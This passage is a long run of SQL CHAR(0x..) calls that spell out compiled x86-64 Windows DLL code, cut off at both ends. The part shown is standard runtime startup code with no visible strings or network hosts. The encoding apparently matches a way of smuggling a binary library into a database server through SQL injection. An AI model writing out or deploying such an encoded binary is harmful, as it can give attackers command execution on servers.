(0x40),CHAR(0x8a),CHAR(0xcf),CHAR(0xe8),CHAR(0x25),CHAR(0x07),CHAR(0x00),CHAR(0x00),CHAR(0xf6),CHAR(0xd8),CHAR(0x1b),CHAR(0xdb),CHAR(0x83),CHAR(0xe3),CHAR(0x01),CHAR(0xe8),CHAR(0x71),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x8b),CHAR(0xc3),CHAR(0xeb),CHAR(0xa2),CHAR(0xb9),CHAR(0x07),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x47),CHAR(0x07),CHAR(0x00),CHAR(0x00),CHAR(0x90),CHAR(0x90),CHAR(0xcc),CHAR(0x48),CHAR(0x8b),CHAR(0xc4),CHAR(0x48),CHAR(0x89),CHAR(0x58),CHAR(0x20),CHAR(0x4c),CHAR(0x89),CHAR(0x40),CHAR(0x18),CHAR(0x89),CHAR(0x50),CHAR(0x10),CHAR(0x48),CHAR(0x89),CHAR(0x48),CHAR(0x08),CHAR(0x56),CHAR(0x57),CHAR(0x41),CHAR(0x56),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x40),CHAR(0x49),CHAR(0x8b),CHAR(0xf0),CHAR(0x8b),CHAR(0xfa),CHAR(0x4c),CHAR(0x8b),CHAR(0xf1),CHAR(0x85),CHAR(0xd2),CHAR(0x75),CHAR(0x0f),CHAR(0x39),CHAR(0x15),CHAR(0x44),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x7f),CHAR(0x07),CHAR(0x33),CHAR(0xc0),CHAR(0xe9),CHAR(0xf0),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x8d),CHAR(0x42),CHAR(0xff),CHAR(0x83),CHAR(0xf8),CHAR(0x01),CHAR(0x77),CHAR(0x45),CHAR(0x48),CHAR(0x8b),CHAR(0x05),CHAR(0xac),CHAR(0x1f),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x85),CHAR(0xc0),CHAR(0x75),CHAR(0x0a),CHAR(0xc7),CHAR(0x44),CHAR(0x24),CHAR(0x30),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xeb),CHAR(0x14),CHAR(0xff),CHAR(0x15),CHAR(0xcf),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0x8b),CHAR(0xd8),CHAR(0x89),CHAR(0x44),CHAR(0x24),CHAR(0x30),CHAR(0x85),CHAR(0xc0),CHAR(0x0f),CHAR(0x84),CHAR(0xb4),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x8b),CHAR(0xc6),CHAR(0x8b),CHAR(0xd7),CHAR(0x49),CHAR(0x8b),CHAR(0xce),CHAR(0xe8),CHAR(0xa0),CHAR(0xfd),CHAR(0xff),CHAR(0xff),CHAR(0x8b),CHAR(0xd8),CHAR(0x89),CHAR(0x44),CHAR(0x24),CHAR(0x30),CHAR(0x85),CHAR(0xc0),CHAR(0x0f),CHAR(0x84),CHAR(0x99),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x8b),CHAR(0xc6),CHAR(0x8b),CHAR(0xd7),CHAR(0x49),CHAR(0x8b),CHAR(0xce),CHAR(0xe8),CHAR(0x0d),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x8b),CHAR(0xd8),CHAR(0x89),CHAR(0x44),CHAR(0x24),CHAR(0x30),CHAR(0x83),CHAR(0xff),CHAR(0x01),CHAR(0x75),CHAR(0x38),CHAR(0x85),CHAR(0xc0),CHAR(0x75),CHAR(0x7d),CHAR(0x4c),CHAR(0x8b),CHAR(0xc6),CHAR(0x33),CHAR(0xd2),CHAR(0x49),CHAR(0x8b),CHAR(0xce),CHAR(0xe8),CHAR(0xf1),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x85),CHAR(0xf6),CHAR(0x0f),CHAR(0x95),CHAR(0xc1),CHAR(0xe8),CHAR(0xc6),CHAR(0xfe),CHAR(0xff),CHAR(0xff),CHAR(0x48),CHAR(0x8b),CHAR(0x05),CHAR(0x33),CHAR(0x1f),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x59),CHAR(0x4c),CHAR(0x8b),CHAR(0xc6),CHAR(0x33),CHAR(0xd2),CHAR(0x49),CHAR(0x8b),CHAR(0xce),CHAR(0xff),CHAR(0x15),CHAR(0x58),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0xeb),CHAR(0x49),CHAR(0x85),CHAR(0xff),CHAR(0x74),CHAR(0x05),CHAR(0x83),CHAR(0xff),CHAR(0x03),CHAR(0x75),CHAR(0x40),CHAR(0x4c),CHAR(0x8b),CHAR(0xc6),CHAR(0x8b),CHAR(0xd7),CHAR(0x49),CHAR(0x8b),CHAR(0xce),CHAR(0xe8),CHAR(0x2c),CHAR(0xfd),CHAR(0xff),CHAR(0xff),CHAR(0x8b),CHAR(0xd8),CHAR(0x89),CHAR(0x44),CHAR(0x24),CHAR(0x30),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x29),CHAR(0x48),CHAR(0x8b),CHAR(0x05),CHAR(0xf7),CHAR(0x1e),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x85),CHAR(0xc0),CHAR(0x75),CHAR(0x09),CHAR(0x8d),CHAR(0x58),CHAR(0x01),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x30),CHAR(0xeb),CHAR(0x14),CHAR(0x4c),CHAR(0x8b),CHAR(0xc6),CHAR(0x8b),CHAR(0xd7),CHAR(0x49),CHAR(0x8b),CHAR(0xce),CHAR(0xff),CHAR(0x15),CHAR(0x13),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0x8b),CHAR(0xd8),CHAR(0x89),CHAR(0x44),CHAR(0x24),CHAR(0x30),CHAR(0xeb),CHAR(0x06),CHAR(0x33),CHAR(0xdb),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x30),CHAR(0x8b),CHAR(0xc3),CHAR(0x48),CHAR(0x8b),CHAR(0x5c),CHAR(0x24),CHAR(0x78),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x40),CHAR(0x41),CHAR(0x5e),CHAR(0x5f),CHAR(0x5e),CHAR(0xc3),CHAR(0xcc),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x08),CHAR(0x48),CHAR(0x89),CHAR(0x74),CHAR(0x24),CHAR(0x10),CHAR(0x57),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x49),CHAR(0x8b),CHAR(0xf8),CHAR(0x8b),CHAR(0xda),CHAR(0x48),CHAR(0x8b),CHAR(0xf1),CHAR(0x83),CHAR(0xfa),CHAR(0x01),CHAR(0x75),CHAR(0x05),CHAR(0xe8),CHAR(0x9b),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x8b),CHAR(0xc7),CHAR(0x8b),CHAR(0xd3),CHAR(0x48),CHAR(0x8b),CHAR(0xce),CHAR(0x48),CHAR(0x8b),CHAR(0x5c),CHAR(0x24),CHAR(0x30),CHAR(0x48),CHAR(0x8b),CHAR(0x74),CHAR(0x24),CHAR(0x38),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5f),CHAR(0xe9),CHAR(0x8f),CHAR(0xfe),CHAR(0xff),CHAR(0xff),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x40),CHAR(0x53),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x48),CHAR(0x8b),CHAR(0xd9),CHAR(0x33),CHAR(0xc9),CHAR(0xff),CHAR(0x15),CHAR(0xcb),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0xcb),CHAR(0xff),CHAR(0x15),CHAR(0xba),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x15),CHAR(0xc4),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0xc8),CHAR(0xba),CHAR(0x09),CHAR(0x04),CHAR(0x00),CHAR(0xc0),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5b),CHAR(0x48),CHAR(0xff),CHAR(0x25),CHAR(0xb8),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x89),CHAR(0x4c),CHAR(0x24),CHAR(0x08),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x38),CHAR(0xb9),CHAR(0x17),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x15),CHAR(0x09),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x07),CHAR(0xb9),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xcd),CHAR(0x29),CHAR(0x48),CHAR(0x8d),CHAR(0x0d),CHAR(0x53),CHAR(0x2a),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0xaa),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x44),CHAR(0x24),CHAR(0x38),CHAR(0x48),CHAR(0x89),CHAR(0x05),CHAR(0x3a),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x44),CHAR(0x24),CHAR(0x38),CHAR(0x48),CHAR(0x83),CHAR(0xc0),CHAR(0x08),CHAR(0x48),CHAR(0x89),CHAR(0x05),CHAR(0xca),CHAR(0x2a),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x05),CHAR(0x23),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x89),CHAR(0x05),CHAR(0x94),CHAR(0x29),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x44),CHAR(0x24),CHAR(0x40),CHAR(0x48),CHAR(0x89),CHAR(0x05),CHAR(0x98),CHAR(0x2a),CHAR(0x00),CHAR(0x00),CHAR(0xc7),CHAR(0x05),CHAR(0x6e),CHAR(0x29),CHAR(0x00),CHAR(0x00),CHAR(0x09),CHAR(0x04),CHAR(0x00),CHAR(0xc0),CHAR(0xc7),CHAR(0x05),CHAR(0x68),CHAR(0x29),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xc7),CHAR(0x05),CHAR(0x72),CHAR(0x29),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x6b),CHAR(0xc0),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x0d),CHAR(0x6a),CHAR(0x29),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0xc7),CHAR(0x04),CHAR(0x01),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x6b),CHAR(0xc0),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x0d),CHAR(0xea),CHAR(0x28),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x89),CHAR(0x4c),CHAR(0x04),CHAR(0x20),CHAR(0xb8),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x6b),CHAR(0xc0),CHAR(0x01),CHAR(0x48),CHAR(0x8b),CHAR(0x0d),CHAR(0xcd),CHAR(0x28),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x89),CHAR(0x4c),CHAR(0x04),CHAR(0x20),CHAR(0x48),CHAR(0x8d),CHAR(0x0d),CHAR(0x89),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x00),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x38),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x40),CHAR(0x53),CHAR(0x56),CHAR(0x57),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x40),CHAR(0x48),CHAR(0x8b),CHAR(0xd9),CHAR(0xff),CHAR(0x15),CHAR(0xa3),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0xb3),CHAR(0xf8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x33),CHAR(0xff),CHAR(0x45),CHAR(0x33),CHAR(0xc0),CHAR(0x48),CHAR(0x8d),CHAR(0x54),CHAR(0x24),CHAR(0x60),CHAR(0x48),CHAR(0x8b),CHAR(0xce),CHAR(0xff),CHAR(0x15),CHAR(0x91),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x39),CHAR(0x48),CHAR(0x83),CHAR(0x64),CHAR(0x24),CHAR(0x38),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x4c),CHAR(0x24),CHAR(0x68),CHAR(0x48),CHAR(0x8b),CHAR(0x54),CHAR(0x24),CHAR(0x60),CHAR(0x4c),CHAR(0x8b),CHAR(0xc8),CHAR(0x48),CHAR(0x89),CHAR(0x4c),CHAR(0x24),CHAR(0x30),CHAR(0x4c),CHAR(0x8b),CHAR(0xc6),CHAR(0x48),CHAR(0x8d),CHAR(0x4c),CHAR(0x24),CHAR(0x70),CHAR(0x48),CHAR(0x89),CHAR(0x4c),CHAR(0x24),CHAR(0x28),CHAR(0x33),CHAR(0xc9),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x20),CHAR(0xff),CHAR(0x15),CHAR(0x62),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0xc7),CHAR(0x83),CHAR(0xff),CHAR(0x02),CHAR(0x7c),CHAR(0xb1),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x40),CHAR(0x5f),CHAR(0x5e),CHAR(0x5b),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x20),CHAR(0x55),CHAR(0x48),CHAR(0x8b),CHAR(0xec),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x48),CHAR(0x8b),CHAR(0x05),CHAR(0x34),CHAR(0x28),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0xbb),CHAR(0x32),CHAR(0xa2),CHAR(0xdf),CHAR(0x2d),CHAR(0x99),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x3b),CHAR(0xc3),CHAR(0x75),CHAR(0x74),CHAR(0x48),CHAR(0x83),CHAR(0x65),CHAR(0x18),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x4d),CHAR(0x18),CHAR(0xff),CHAR(0x15),CHAR(0x66),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x45),CHAR(0x18),CHAR(0x48),CHAR(0x89),CHAR(0x45),CHAR(0x10),CHAR(0xff),CHAR(0x15),CHAR(0x50),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0x8b),CHAR(0xc0),CHAR(0x48),CHAR(0x31),CHAR(0x45),CHAR(0x10),CHAR(0xff),CHAR(0x15),CHAR(0x3c),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0x8b),CHAR(0xc0),CHAR(0x48),CHAR(0x8d),CHAR(0x4d),CHAR(0x20),CHAR(0x48),CHAR(0x31),CHAR(0x45),CHAR(0x10),CHAR(0xff),CHAR(0x15),CHAR(0x24),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0x8b),CHAR(0x45),CHAR(0x20),CHAR(0x48),CHAR(0x8d),CHAR(0x4d),CHAR(0x10),CHAR(0x48),CHAR(0xc1),CHAR(0xe0),CHAR(0x20),CHAR(0x48),CHAR(0x33),CHAR(0x45),CHAR(0x20),CHAR(0x48),CHAR(0x33),CHAR(0x45),CHAR(0x10),CHAR(0x48),CHAR(0x33),CHAR(0xc1),CHAR(0x48),CHAR(0xb9),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x23),CHAR(0xc1),CHAR(0x48),CHAR(0xb9),CHAR(0x33),CHAR(0xa2),CHAR(0xdf),CHAR(0x2d),CHAR(0x99),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x3b),CHAR(0xc3),CHAR(0x48),CHAR(0x0f),CHAR(0x44),CHAR(0xc1),CHAR(0x48),CHAR(0x89),CHAR(0x05),CHAR(0xb1),CHAR(0x27),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x5c),CHAR(0x24),CHAR(0x48),CHAR(0x48),CHAR(0xf7),CHAR(0xd0),CHAR(0x48),CHAR(0x89),CHAR(0x05),CHAR(0x9a),CHAR(0x27),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5d),CHAR(0xc3),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0x83),CHAR(0xfa),CHAR(0x01),CHAR(0x75),CHAR(0x10),CHAR(0x48),CHAR(0x83),CHAR(0x3d),CHAR(0x43),CHAR(0x1c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x75),CHAR(0x06),CHAR(0xff),CHAR(0x15),CHAR(0xdb),CHAR(0x17),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0xcc),CHAR(0x48),CHAR(0x8d),CHAR(0x0d),CHAR(0x29),CHAR(0x2d),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0xff),CHAR(0x25),CHAR(0xca),CHAR(0x17),CHAR(0x00),CHAR(0x00),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x8d),CHAR(0x0d),CHAR(0x19),CHAR(0x2d),CHAR(0x00),CHAR(0x00),CHAR(0xe9),CHAR(0x00),CHAR(0x07),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x05),CHAR(0x1d),CHAR(0x2d),CHAR(0x00),CHAR(0x00),CHAR(0xc3),CHAR(0x48),CHAR(0x8d),CHAR(0x05),CHAR(0x1d),CHAR(0x2d),CHAR(0x00),CHAR(0x00),CHAR(0xc3),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0xe8),CHAR(0xe7),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0x48),CHAR(0x83),CHAR(0x08),CHAR(0x24),CHAR(0xe8),CHAR(0xe6),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0x48),CHAR(0x83),CHAR(0x08),CHAR(0x02),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0xcc),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0xe8),CHAR(0xa7),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x21),CHAR(0x65),CHAR(0x48),CHAR(0x8b),CHAR(0x04),CHAR(0x25),CHAR(0x30),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x48),CHAR(0x08),CHAR(0xeb),CHAR(0x05),CHAR(0x48),CHAR(0x3b),CHAR(0xc8),CHAR(0x74),CHAR(0x14),CHAR(0x33),CHAR(0xc0),CHAR(0xf0),CHAR(0x48),CHAR(0x0f),CHAR(0xb1),CHAR(0x0d),CHAR(0xe4),CHAR(0x2c),CHAR(0x00),CHAR(0x00),CHAR(0x75),CHAR(0xee),CHAR(0x32),CHAR(0xc0),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0xb0),CHAR(0x01),CHAR(0xeb),CHAR(0xf7),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0xe8),CHAR(0x6b),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x07),CHAR(0xe8),CHAR(0xb6),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0xeb),CHAR(0x19),CHAR(0xe8),CHAR(0x53),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x8b),CHAR(0xc8),CHAR(0xe8),CHAR(0x96),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x04),CHAR(0x32),CHAR(0xc0),CHAR(0xeb),CHAR(0x07),CHAR(0xe8),CHAR(0x8f),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0xb0),CHAR(0x01),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0x33),CHAR(0xc9),CHAR(0xe8),CHAR(0x3d),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x84),CHAR(0xc0),CHAR(0x0f),CHAR(0x95),CHAR(0xc0),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0xe8),CHAR(0x7f),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x84),CHAR(0xc0),CHAR(0x75),CHAR(0x04),CHAR(0x32),CHAR(0xc0),CHAR(0xeb),CHAR(0x12),CHAR(0xe8),CHAR(0x72),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x84),CHAR(0xc0),CHAR(0x75),CHAR(0x07),CHAR(0xe8),CHAR(0x69),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0xeb),CHAR(0xec),CHAR(0xb0),CHAR(0x01),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0xe8),CHAR(0x57),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x52),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0xb0),CHAR(0x01),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x08),CHAR(0x48),CHAR(0x89),CHAR(0x6c),CHAR(0x24),CHAR(0x10),CHAR(0x48),CHAR(0x89),CHAR(0x74),CHAR(0x24),CHAR(0x18),CHAR(0x57),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x49),CHAR(0x8b),CHAR(0xf9),CHAR(0x49),CHAR(0x8b),CHAR(0xf0),CHAR(0x8b),CHAR(0xda),CHAR(0x48),CHAR(0x8b),CHAR(0xe9),CHAR(0xe8),CHAR(0xc4),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x75),CHAR(0x16),CHAR(0x83),CHAR(0xfb),CHAR(0x01),CHAR(0x75),CHAR(0x11),CHAR(0x4c),CHAR(0x8b),CHAR(0xc6),CHAR(0x33),CHAR(0xd2),CHAR(0x48),CHAR(0x8b),CHAR(0xcd),CHAR(0x48),CHAR(0x8b),CHAR(0xc7),CHAR(0xff),CHAR(0x15),CHAR(0x1a),CHAR(0x17),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x54),CHAR(0x24),CHAR(0x58),CHAR(0x8b),CHAR(0x4c),CHAR(0x24),CHAR(0x50),CHAR(0x48),CHAR(0x8b),CHAR(0x5c),CHAR(0x24),CHAR(0x30),CHAR(0x48),CHAR(0x8b),CHAR(0x6c),CHAR(0x24),CHAR(0x38),CHAR(0x48),CHAR(0x8b),CHAR(0x74),CHAR(0x24),CHAR(0x40),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5f),CHAR(0xe9),CHAR(0xc4),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0xe8),CHAR(0x7f),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x10),CHAR(0x48),CHAR(0x8d),CHAR(0x0d),CHAR(0xe4),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xe9),CHAR(0xbf),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0xca),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x75),CHAR(0x05),CHAR(0xe8),CHAR(0xb7),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0x33),CHAR(0xc9),CHAR(0xe8),CHAR(0xad),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xe9),CHAR(0xa4),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x53),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x0f),CHAR(0xb6),CHAR(0x05),CHAR(0x9f),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc9),CHAR(0xbb),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x0f),CHAR(0x44),CHAR(0xc3),CHAR(0x88),CHAR(0x05),CHAR(0x8f),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x76),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x7d),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x84),CHAR(0xc0),CHAR(0x75),CHAR(0x04),CHAR(0x32),CHAR(0xc0),CHAR(0xeb),CHAR(0x14),CHAR(0xe8),CHAR(0x70),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x84),CHAR(0xc0),CHAR(0x75),CHAR(0x09),CHAR(0x33),CHAR(0xc9),CHAR(0xe8),CHAR(0x65),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0xeb),CHAR(0xea),CHAR(0x8a),CHAR(0xc3),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5b),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x40),CHAR(0x53),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x80),CHAR(0x3d),CHAR(0x54),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x8b),CHAR(0xd9),CHAR(0x75),CHAR(0x67),CHAR(0x83),CHAR(0xf9),CHAR(0x01),CHAR(0x77),CHAR(0x6a),CHAR(0xe8),CHAR(0xdd),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x28),CHAR(0x85),CHAR(0xdb),CHAR(0x75),CHAR(0x24),CHAR(0x48),CHAR(0x8d),CHAR(0x0d),CHAR(0x3e),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x17),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x75),CHAR(0x10),CHAR(0x48),CHAR(0x8d),CHAR(0x0d),CHAR(0x46),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x07),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x2e),CHAR(0x32),CHAR(0xc0),CHAR(0xeb),CHAR(0x33),CHAR(0x66),CHAR(0x0f),CHAR(0x6f),CHAR(0x05),CHAR(0x01),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc8),CHAR(0xff),CHAR(0xf3),CHAR(0x0f),CHAR(0x7f),CHAR(0x05),CHAR(0x0d),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x89),CHAR(0x05),CHAR(0x16),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(